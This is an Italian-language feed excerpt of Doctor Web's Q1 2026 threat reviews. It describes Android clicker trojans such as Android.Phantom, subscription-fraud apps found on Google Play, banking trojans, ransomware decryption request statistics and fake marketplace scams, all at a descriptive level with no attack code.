&lt;p&gt;A gennaio l'azienda Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15110" target="_blank"&gt;ha informato&lt;/a&gt; gli utenti di &lt;b&gt;Android.Phantom&lt;/b&gt; — una nuova famiglia di applicazioni trojan clicker. I nostri analisti dei virus hanno identificato diverse fonti di distribuzione di questi malware. Tra di esse, lo store di applicazioni ufficiale per dispositivi Xiaomi GetApps, dove i trojan erano incorporati in alcuni giochi. Oltre a questo, i cybercriminali distribuivano i clicker insieme a mod di popolari applicazioni tramite diversi canali Telegram, server Discord, raccolte software online e siti malevoli.&lt;/p&gt;

&lt;p&gt;Tramite &lt;b&gt;Android.Phantom&lt;/b&gt;, i malintenzionati aumentano artificialmente i clic pubblicitari su siti web, impiegando per questo le tecnologie di machine learning e la WebRTC — tecnologia di trasmissione in streaming di dati (inclusi video) attraverso il browser. I trojan caricano in una WebView invisibile le risorse internet target insieme a un codice JavaScript per la simulazione di azioni utente. L'interazione con gli annunci avviene in una delle due modalità. Se sul dispositivo è possibile l'utilizzo della WebRTC, i clicker &lt;b&gt;Android.Phantom&lt;/b&gt; trasmettono in streaming lo schermo virtuale con un sito caricato ai malintenzionati, i quali lo gestiscono manualmente o utilizzando un sistema automatizzato.&lt;/p&gt;

&lt;p&gt;Se la WebRTC non è disponibile, vengono impiegati script automatizzati in JavaScript che utilizzano il framework TensorFlowJS. I clicker scaricano dal server remoto il modello comportamentale richiesto, nonché il JavaScript contenente il framework stesso e tutte le funzioni necessarie per il funzionamento del modello e l'interazione con i siti target.&lt;/p&gt;

&lt;p&gt;Durante il I trimestre, il laboratorio antivirus dell'azienda Doctor Web ha registrato la comparsa di nuove minacce sullo store di app Google Play. Queste includevano numerose applicazioni trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, nonché i programmi malevoli &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;. Questi ultimi sono progettati per abbonare utenti a servizi a pagamento.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di i trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; sono diventati le minacce Android più diffuse&lt;/li&gt;
        &lt;li&gt;Malintenzionati utilizzano sempre più spesso gli strumenti per il modding di programmi Android allo scopo di proteggere i trojan bancari&lt;/li&gt;
        &lt;li&gt;Continuato il calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Diventate diffuse le applicazioni trojan &lt;b&gt;Android.Phantom&lt;/b&gt;, che utilizzano il machine learning e streaming video per l'aumento artificiale dei clic su siti web&lt;/li&gt;
        &lt;li&gt;Rilevate nuove applicazioni malevole sullo store di app Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati di Dr.Web Security Space per dispositivi mobili&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/01_malware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan bancario che intercetta gli SMS con codici monouso da istituti di credito, il contenuto di notifiche, nonché raccoglie altre informazioni confidenziali. Queste ultime includono dati tecnici sul dispositivo infetto, la lista di applicazioni installate, informazioni sulla scheda SIM, su chiamate ed SMS ricevuti e inviati.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che carica il sito web specificato nelle sue impostazioni. Le varianti conosciute di questa applicazione malevola caricano un sito di casinò online.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan per la visualizzazione di pubblicità invadenti. I campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; spesso vengono distribuiti sotto le apparenze di applicazioni innocue, e in alcuni casi, vengono installati nella directory di sistema da altri software malevoli. Entrando su dispositivi Android, tali trojan pubblicitari di solito nascondono all'utente la propria presenza nel sistema: per esempio, nascondono l'icona dell'applicazione dal menu della schermata principale.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un programma di offuscamento, utilizzato, tra l'altro, per la protezione di applicazioni malevole (ad esempio, di alcune versioni dei trojan bancari &lt;b&gt;Android.SpyMax&lt;/b&gt;).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Android.Click&amp;lng=it"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di mod malevole dell'applicazione di messaggistica WhatsApp, che impercettibilmente per l'utente possono caricare vari siti in modalità background.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/02_unwanted_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi pubblicitari che simulano il funzionamento di software antivirus. Tali programmi possono segnalare minacce inesistenti e ingannare gli utenti chiedendo di pagare per l'acquisto di una versione completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni che presumibilmente consentirebbero di guadagnare con l'effettuazione di determinate azioni o compiti. Questi programmi simulano l'accredito di premi, tuttavia, per ritirare il denaro "guadagnato", è necessario accumulare una determinata somma. Di solito, hanno una lista di sistemi di pagamento e banche più popolari, attraverso cui presumibilmente sarebbe possibile ritirare i premi. Ma anche quando gli utenti riescono ad accumulare la somma da ritirare sufficiente, non ricevono i pagamenti promessi. Con questo record vengono rilevati anche altri software indesiderati basati sul codice di tali programmi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite il servizio cloud CloudInject e l'omonima utility Android (aggiunta al database dei virus Dr.Web come &lt;a href="https://vms.drweb-av.it/search/?q=Tool.CloudInject&amp;lng=it"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Tali programmi vengono modificati sul server remoto, e l'utente (modificatore) interessato a modificarli non ha il controllo su che cosa esattamente verrà incorporato in essi. Inoltre, le applicazioni ricevono un set di autorizzazioni pericolose. Dopo la modificazione dei programmi, il modificatore ottiene la possibilità di gestirli in remoto: bloccarli, visualizzare dialoghi configurabili, tracciare l'installazione e la rimozione di altri software ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma per il monitoraggio dei proprietari di dispositivi Android. Consente di leggere SMS, ottenere informazioni su chiamate, tracciare la posizione del dispositivo e registrare l'audio dell'ambiente circostante.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/03_riskware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.Obfuscator.TrashCode&amp;lng=it"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi Android in cui tramite strumenti hacker per il modding di applicazioni è aggiunto codice spazzatura. Tale modificazione viene eseguita allo scopo di confondere la logica dei programmi. Questa tecnica è spesso riscontrata nei trojan bancari e nelle versioni pirata di software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di applicazioni Android modificate tramite l'utility NP Manager. Questa utility contiene moduli per l'offuscamento e la protezione del codice di programmi, nonché per l'aggiramento del controllo della loro firma digitale dopo la modifica. L'offuscamento da essa aggiunto spesso viene utilizzato in malware per renderne più difficile il rilevamento e l'analisi.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Tool.LuckyPatcher&amp;lng=it"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utility che consente di modificare le applicazioni Android installate (creare patch per esse) al fine di modificarne la logica di funzionamento o aggirare determinate restrizioni. Ad esempio, utilizzandola, gli utenti possono tentare di disattivare il controllo dei permessi di root in programmi bancari od ottenere risorse illimitate in giochi. Per creare le patch, l'utility scarica da internet script appositamente preparati che chiunque sia interessato può creare e aggiungere a un database comune. Le funzionalità di tali script possono risultare, tra l'altro, anche malevole, pertanto, le patch create possono rappresentare un potenziale pericolo.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/04_adware_q1_2026_en.3.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Bastion&amp;lng=it"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi di ottimizzazione che creano periodicamente notifiche con messaggi fuorvianti su presunti memoria insufficiente ed errori di sistema allo scopo di visualizzare annunci pubblicitari durante "l'ottimizzazione".&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.AdPush&amp;lng=it"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo adware che può essere integrato in programmi Android. Visualizza notifiche pubblicitarie che fuorviano gli utenti. Ad esempio, tali notifiche possono somigliare ai messaggi del sistema operativo. Inoltre, questo modulo raccoglie una serie di dati riservati, ed è in grado di scaricare altre app e avviarne l'installazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Applicazioni spacciate per strumenti di cheat per l'ottenimento di risorse in giochi. In realtà, sono creati per la visualizzazione di pubblicità. Questi programmi ricevono dal server remoto la configurazione, in base alla quale caricano un sito target con annunci: banner, finestre a comparsa, filmati ecc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Adware.Fictus&amp;lng=it"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modulo pubblicitario che i malintenzionati incorporano in versioni clone di popolari giochi e programmi Android. Viene integrato in programmi tramite un packer specializzato net2share. Le copie di software create in questo modo vengono distribuite attraverso diversi store di app, e dopo l'installazione visualizzano pubblicità indesiderate.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Moduli software che vengono incorporati in applicazioni Android e visualizzano le più svariate pubblicità. A seconda della versione e variante, queste possono essere notifiche, finestre a comparsa o banner pubblicitari. Tramite questi moduli, i malintenzionati spesso distribuiscono programmi malevoli invitando a installare determinati software. Inoltre, tali moduli trasmettono al server remoto varie informazioni riservate.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Minacce su Google Play&lt;/h3&gt;

&lt;p&gt;Nel I trimestre 2026 gli specialisti del laboratorio antivirus Doctor Web hanno individuato sullo store di app Google Play ulteriori applicazioni malevole &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che iscrivono le vittime a servizi a pagamento. I trojan erano nascosti in una serie di utility per l'ottimizzazione del funzionamento di dispositivi Android, nonché venivano distribuiti sotto le false apparenze di app di messaggistica, software multimediali e altri. Gli utenti li hanno installati complessivamente 370.000 volte.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/05_Android.Joker.2524.1.jpg"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.jpg" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/06_Android.Joker.2511.1.jpg"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempi di malware &lt;b&gt;Android.Joker&lt;/b&gt;, rilevati su Google Play nel I trimestre 2026. &lt;b&gt;Android.Joker.2511&lt;/b&gt; era incorporato nell'app di messaggistica Private Chat Message, e &lt;b&gt;Android.Joker.2524&lt;/b&gt; nel programma fotocamera Magic Camera&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Inoltre, i nostri analisti di virus hanno rilevato i programmi malevoli denominati &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.23&lt;/b&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Android.Subscription&amp;lng=it"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.24&lt;/b&gt;, anche questi studiati per abbonare utenti a servizi a pagamento. I trojan caricano siti web su cui tramite la tecnologia Wap Click vengono attivati abbonamenti mobili a pagamento. Su questi siti agli utenti viene chiesto il numero di cellulare, dopodiché avviene un tentativo di abbonamento automatico al servizio. Complessivamente le due applicazioni malevole sono state scaricate dallo store Google Play oltre 1.500.000 volte.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/07_Android.Subscription.23.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_mobile_q1/08_Android.Subscription.24.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Malware &lt;b&gt;Android.Subscription.23&lt;/b&gt; e &lt;b&gt;Android.Subscription.24&lt;/b&gt; venivano distribuiti con il pretesto delle app per la gestione di finanze personali Stream Hive e Prime Link, tuttavia, la loro unica funzionalità consisteva nel caricare i siti per l'abbonamento di proprietari di dispositivi Android a servizi mobili a pagamento&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Per la protezione dei dispositivi Android dai programmi malevoli e indesiderati, consigliamo agli utenti di installare i prodotti antivirus Dr.Web per Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicatori di compromissione&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15135&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in I trimestre 2026</title><link>https://news.drweb-av.it/show/?i=15135&amp;lng=it&amp;c=5</link><pubDate>Wed, 01 Apr 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;1 aprile 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web, nel I trimestre 2026 il numero totale di minacce rilevate è diminuito del 6,77% rispetto al IV trimestre dell'anno scorso. Il numero di minacce uniche è diminuito dell'11,98%. Prevalentemente sui dispositivi protetti venivano rilevati i software pubblicitari e i trojan pubblicitari, i programmi malevoli downloader, nonché i backdoor.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Nel traffico email i rilevamenti più frequenti sono stati gli script malevoli, i backdoor e le varie applicazioni trojan. Tramite messaggi email i malintenzionati distribuivano anche i documenti di phishing e gli exploit.&lt;/p&gt;

&lt;p&gt;Gli utenti i cui file sono stati colpiti dai trojan ransomware di criptazione hanno riscontrato predominantemente &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; e &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Nel I trimestre 2026, gli analisti internet dell'azienda Doctor Web hanno individuato nuovi siti di phishing, incluse false risorse di istituti di credito e di marketplace, nonché una serie di altri siti indesiderati.&lt;/p&gt;

&lt;p&gt;Nel segmento di dispositivi mobili, si osservava un'attività aumentata dei trojan bancari. In particolare, i nostri analisti di virus hanno notato una crescente popolarità di un metodo di protezione dei malware dal rilevamento dai software antivirus, che consiste nell'aggiungere ai malware il codice spazzatura. &lt;/p&gt;

&lt;p&gt;A gennaio gli esperti Doctor Web hanno parlato dei trojan clicker &lt;b&gt;Android.Phantom&lt;/b&gt;, che utilizzano il machine learning e lo streaming video per l'aumento artificiale dei clic su siti web. Inoltre, durante gli ultimi 3 mesi, abbiamo registrato la comparsa sullo store di app Google Play di ulteriori programmi malevoli, tra cui i trojan che iscrivono utenti a servizi a pagamento.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di I trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Diminuito il numero di minacce rilevate sui dispositivi protetti &lt;/li&gt;
        &lt;li&gt;Diminuito il numero di file unici tra le minacce rilevate&lt;/li&gt;
        &lt;li&gt;Registrate meno richieste di decriptazione di file colpiti da programmi trojan ransomware di criptazione, rispetto al periodo di osservazione precedente&lt;/li&gt;
        &lt;li&gt;Continuata la crescita dell'attività dei trojan bancari per dispostivi Android&lt;/li&gt;
        &lt;li&gt;Riscontrati dagli utenti i programmi malevoli clicker &lt;b&gt;Android.Phantom&lt;/b&gt;, che utilizzano, tra l'altro, le tecnologie di machine learning per manipolare i clic su siti web&lt;/li&gt;
        &lt;li&gt;Rilevati sullo store di app Google Play ulteriori programmi malevoli&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/01_stat_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse di I trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Trojan scritto nel linguaggio di programmazione Go e studiato per caricare nel sistema di destinazione vari cryptominer e software pubblicitari. Il programma malevolo è un file DLL e si trova in &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Per avviarsi, sfrutta la vulnerabilità di classe DLL Search Order Hijacking nel client torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Adware.Downware.20655&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Software pubblicitario utilizzato come installer intermedio di programmi pirata.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;Adware.Siggen.33379&lt;/dt&gt;
    &lt;dd&gt;Falsa estensione di blocco di pubblicità per browser Adblock Plus, che viene installata nel sistema da altre applicazioni malevole allo scopo di visualizzazione di annunci pubblicitari.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistiche delle applicazioni malevole nel traffico email&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/02_mail_traffic_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse nel traffico email di I trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;JS.DownLoader.1225&lt;/dt&gt;
    &lt;dd&gt;Rilevamento euristico per gli archivi ZIP contenenti script JavaScript con nomi sospetti.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Exploit per l'utilizzo di vulnerabilità nel software Microsoft Office, che consentono di eseguire codice arbitrario.&lt;/dd&gt;
    &lt;dt&gt;JS.Redirector.514&lt;/dt&gt;
    &lt;dd&gt;Script malevolo che reindirizza l'utente a una pagina web controllata dai malintenzionati.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;

&lt;p&gt;Nel I trimestre 2026, le richieste di decriptazione di file colpiti da trojan ransomware di criptazione sono diminuite del 31,51% rispetto al IV trimestre dell'anno scorso. Il calo si è verificato nel contesto del prolungato periodo delle festività di Capodanno e dei relativi giorni non lavorativi, durante il quale alcuni cybercriminali potevano sospendere la propria attività e andare in vacanza. Inoltre, gli utenti che hanno subito attacchi dei trojan ransomware di criptazione durante questo periodo probabilmente non hanno reagito immediatamente agli incidenti avvenuti.&lt;/p&gt;

&lt;p&gt;Dinamica del numero di richieste di decriptazione pervenute al Servizio di supporto tecnico Doctor Web:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/03_encoder_requests_q1_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Ransomware di criptazione più diffusi di I trimestre 2026&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 15.59% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.29750&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3.23% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868 &lt;/b&gt; — 3.23% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.26996&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 1.62% di richieste utente&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383 &lt;/b&gt; — 1.61% di richieste utente&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Frode online&lt;/h3&gt;

&lt;p&gt;Durante i 3 mesi passati, gli analisti internet dell'azienda Doctor Web hanno individuato una serie di nuovi falsi siti di marketplace. Su questi siti i truffatori suggeriscono di partecipare a una "svendita" di ordini presumibilmente non ritirati. Lo schema fraudolento consiste in quanto segue: le merci da ordini "non reclamate" sono suddivise in diverse categorie (elettronica, abbigliamento, calzature, cosmetici ecc.) e presumibilmente verrebbero riunite nelle relative scatole a sorpresa. Il contenuto di queste ultime è ignoto e potrà includere, tra l'altro, oggetti di valore. Alle potenziali vittime viene offerta la possibilità di acquistare tali scatole a un prezzo relativamente basso, il che rappresenta l'esca principale.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/04_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/04_market.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso sito web di marketplace promette una "svendita degli ordini non reclamati" che presumibilmente sovraccaricano i magazzini&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Quando un utente sceglie una delle scatole, gli viene chiesto di finalizzare l'ordine e indicare i propri dati personali che possono includere il nome e cognome, il numero di cellulare e l'indirizzo email. Quindi l'utente viene reindirizzato a una pagina di pagamento tramite SBP (nota: Sistema di pagamenti rapidi russo). In fin dei conti, la vittima perde il denaro e trasferisce ai truffatori le proprie informazioni confidenziali.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/05_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/05_market.2.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/06_market.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/april/review_common_q1/06_market.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
